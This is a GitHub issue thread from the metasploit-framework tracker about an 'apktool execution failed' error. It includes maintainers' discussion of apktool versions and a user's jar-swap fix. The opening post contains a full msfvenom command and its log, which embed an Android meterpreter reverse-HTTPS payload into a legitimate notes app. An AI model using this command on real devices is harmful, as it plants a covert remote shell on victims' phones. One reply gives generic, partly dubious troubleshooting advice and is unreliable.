### ISSUE TITLE
Apk tool execution failed solved 

### ISSUE THREAD

**Issue by Thilakrajb1234** [rapid7/metasploit-framework#17848]
[bangkokhermetik](https://github.com/bangkokhermetik) commented [on Aug 20, 2022](https://github.com/rapid7/metasploit-framework/issues/16453#issuecomment-1221116431)

Error: apktool execution failed i do not understand ..need some help thank you ! ;)

```
root㉿kali)-[/home/kali/Desktop/rollin]
└─# msfvenom -x note-1-9-1.apk --arch dalvik --platform android -p android/meterpreter/reverse_https lhost=19x.xxx.x.xx lport=443 -o myhackapk.apk
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
Using APK template: note-1-9-1.apk
[] Creating signing key and keystore..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating hook point..
[] Adding payload as package kx.app.notes.diary.memo.hfzew
[] Loading /tmp/d20220819-12242-h5vnwy/original/smali/net/micode/notes/ui/NotesListActivity.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[] Adding
[*] Rebuilding apk with meterpreter injection as /tmp/d20220819-12242-h5vnwy/output.apk
[-] I: Using Apktool 2.6.1-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:430)
at brut.androlib.Androlib.buildSources(Androlib.java:361)
at brut.androlib.Androlib.build(Androlib.java:313)
at brut.androlib.Androlib.build(Androlib.java:280)
at brut.apktool.Main.cmdBuild(Main.java:255)
at brut.apktool.Main.main(Main.java:82)
Error: apktool execution failed
```

To solve this 
Downlod  commons-text-1.10.0-bin.tar.gz. Frome Google search    Apache commons tex 

After downloading. Extract folder.  And open  folder      after opening folder copy the  file. Named as.   Commons-text1-10-0 jar and 4 jar files     and     past  in usr /share/apktool    paste here.
After pasting  delet previous file commons text 1.9.0 
That's it the problem solved 
If anuly doughts releted to this error please contact me or MSG me
To thilak.998027@gmail.com

**Comment by adfoster-r7** [comment]
@bcoles Would you happen to know if apktool can detect this scenario at all for us, so we can give a better error message to users? 👀 

It looks like it's failing on missing dependencies, but I can't tell if that's missing dependencies of the apk target or the apktool itself

**Comment by bcoles** [comment]
> @bcoles Would you happen to know if apktool can detect this scenario at all for us, so we can give a better error message to users? eyes
> 
> From a glance it looks like it's failing on missing dependencies, but I can't tell if that's missing dependencies of the apk target or the apktool itself

Although there is some discussion on the Metasploit issue tracker and apktool issue tracker about updating `commons-text` or updating to JDK 11 (which likely also updates `commons-text`) to resolve this issue, this issue is apparently fixed in a newer version of apktool (https://github.com/iBotPeaches/Apktool/issues/2541#issuecomment-806168877) as of 2021 "regardless of JDK version".

The output in the post above (which duplicates output from the referenced comment https://github.com/rapid7/metasploit-framework/issues/16453#issuecomment-1221116431) shows apktool version `2.6.1-dirty` is in use.

Firstly, this is a dirty build. Secondly, we throw a warning unless at least version 2.7.0 is used:

https://github.com/rapid7/metasploit-framework/blob/a6159ccda54a661d80a720fef22bf0c0d234b6b9/lib/msf/core/payload/apk.rb#L242-L248

**Comment by bcoles** [comment]
I presume that this is fixed in apktool, and thus in Metasploit by virtue of the `apktool <= 2.7.0` version warning, unless someone can demonstrate the issue on apktool 2.7.0 or newer (and hopefully also provide logs, environment details, and a sample APK).

It is a little disconcerting that the aforementioned comment stating that it will be fixed in "the upcoming release" predates 2.6.0 not 2.7.0. However, the only output I've seen has been from `-dirty` builds.

For what it is worth, ever reference to the above error message on the apktool issue tracker pre-dates the apktool 2.7.0 release:

* https://github.com/iBotPeaches/Apktool/issues?q=is%3Aissue+java.lang.NoSuchMethodError%3A+java.nio.ByteBuffer.clear%28%29Ljava%2Fnio%2FByteBuffer%3B+is%3Aclosed

![java.nio.ByteBuffer.clear issues](https://user-images.githubusercontent.com/434827/229548373-3fdee8f5-05f0-4ef3-9670-50dd49a1d70a.png)

**Comment by saurabhmj11** [comment]
ased on the provided output, it seems that the error is related to the apktool tool. The error message is cut off, so it's hard to tell what the exact problem is. However, here are some common reasons why apktool might fail:

The APK file is corrupt or invalid.
The APK file was encrypted or obfuscated.
The APK file was signed with a certificate that apktool doesn't recognize.
The apktool version is outdated or there is a problem with the installation.
The APK file is too large or complex for apktool to handle.
To solve the issue, you can try the following:

Check that the APK file is valid and not corrupt by opening it with a file archiver, such as 7-Zip or WinRAR. If the file is corrupt, try downloading it again from a different source.
Try decrypting or deobfuscating the APK file before using apktool. There are various tools available online that can do this.
Make sure that you are using the correct certificate to sign the APK file and that apktool recognizes it. You can also try using the --use-aapt2 flag with apktool to force it to use the Android Asset Packaging Tool (AAPT) version 2.
Update apktool to the latest version or try reinstalling it. You can download the latest version from the official apktool website.
If the APK file is too large or complex, try splitting it into smaller parts and processing them separately with apktool.
I hope this helps you solve the issue with apktool.

**Comment by bcoles** [comment]
> From the overview you've given - it seems like we'd be good to update the 2.7 warning to be a hard requirement +1

The currently enforced minimum version 2.4.1 is pretty old, but older versions of apktool should still work fine with a lot of apks so long as the user has a functioning Java environment.

However, 2.7 patches a potential security issue, is likely to be used by most users on most modern systems which have `apktool` packages, includes bug fixes, and introduces new features. I'm fine with setting version 2.7.0 as a minimum requirement. Added in #17862.
